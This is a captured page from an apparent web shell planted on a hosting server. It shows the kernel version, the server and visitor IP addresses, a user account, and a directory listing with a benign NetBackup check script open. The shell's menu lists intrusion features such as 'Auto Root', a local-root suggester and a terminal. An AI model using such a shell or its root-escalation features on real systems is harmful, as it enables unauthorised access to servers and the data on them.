Linux ih01.iridiumhosting.com 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.217.43
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
MXB /
rear /
usr /
share /
rear /
prep /
NBU /
default /
Delete
Unzip
Name
Size
Permission
Date
Action
400_prep_nbu.sh
318
B
-rw-r--r--
2026-04-01 09:39
450_check_nbu_client_configured.sh
480
B
-rw-r--r--
2026-04-01 09:39
Save
Rename
# this script has a simple goal: check if this client system has been properly # defined on the NBU master server and that a backup specification has been # made for this client - no more no less Log "Running: /usr/openv/netbackup/bin/bplist command" LANG=C /usr/openv/netbackup/bin/bplist -l -s `date -d "-5 days" \ "+%m/%d/%Y"` / >/dev/null rc=$? [ $rc -gt 0 ] && LogPrint "WARNING: Netbackup bplist check failed with error code ${rc}. See $RUNTIME_LOGFILE for more details."